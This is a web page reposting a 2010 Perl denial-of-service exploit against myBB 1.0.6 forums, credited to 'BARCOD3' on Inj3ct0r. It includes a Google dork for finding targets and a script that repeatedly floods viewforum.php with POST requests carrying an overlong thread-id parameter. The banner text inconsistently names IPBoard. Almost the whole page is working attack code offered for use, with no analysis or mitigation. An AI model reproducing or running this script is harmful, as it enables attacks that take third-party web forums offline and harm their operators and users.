Home / os / win7

myBB 1.0.6 Denial of Service Exploit

Posted on 06 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>myBB 1.0.6 Denial of Service Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================== myBB 1.0.6 Denial of Service Exploit ==================================== # Date: [06.09.10] # Author: [BARCOD3] # Version: [1,0,6] # Category:: [WEBAPPS] # Google dork: [inurl:powered by mybb] # Tested on: [redhat] #!/usr/bin/perl use IO::Socket; print &quot; +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ &quot;; print &quot;+ IPBoard Denial of service exploit + &quot;; print &quot;+ Coded by barcode + &quot;; print &quot;+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ &quot;; print &quot;Host |without http://www.| &quot;; chomp($host = &lt;STDIN&gt;); print &quot;Path |example. /en or / | &quot;; chomp($pth = &lt;STDIN&gt;); { while($x != 999999) { $postit = &quot;showthread.php?tid=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&quot;; $lrg = length $postit; my $sock = new IO::Socket::INET ( PeerAddr =&gt; &quot;$host&quot;, PeerPort =&gt; &quot;80&quot;, Proto =&gt; &quot;tcp&quot;, ); die &quot; Offline! - Su lanet yere baglanmaya calisiyoruz. '$host' it May be DoSed &quot; unless $sock; print $sock &quot;POST $pth/viewforum.php HTTP/1.1 &quot;; print $sock &quot;Host: $host &quot;; print $sock &quot;Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 &quot;; print $sock &quot;Referer: $host &quot;; print $sock &quot;Accept-Language: en-us &quot;; print $sock &quot;Content-Type: application/x-www-form-urlencoded &quot;; print $sock &quot;Accept-Encoding: gzip, deflate &quot;; print $sock &quot;User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 &quot;; print $sock &quot;Connection: Keep-Alive &quot;; print $sock &quot;Cache-Control: no-cache &quot;; print $sock &quot;Content-Length: $lrg &quot;; print $sock &quot;$postit &quot;; close($sock); syswrite STDOUT, &quot;Saldiri basladi... Sakin ol. &quot;; $x++; } } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP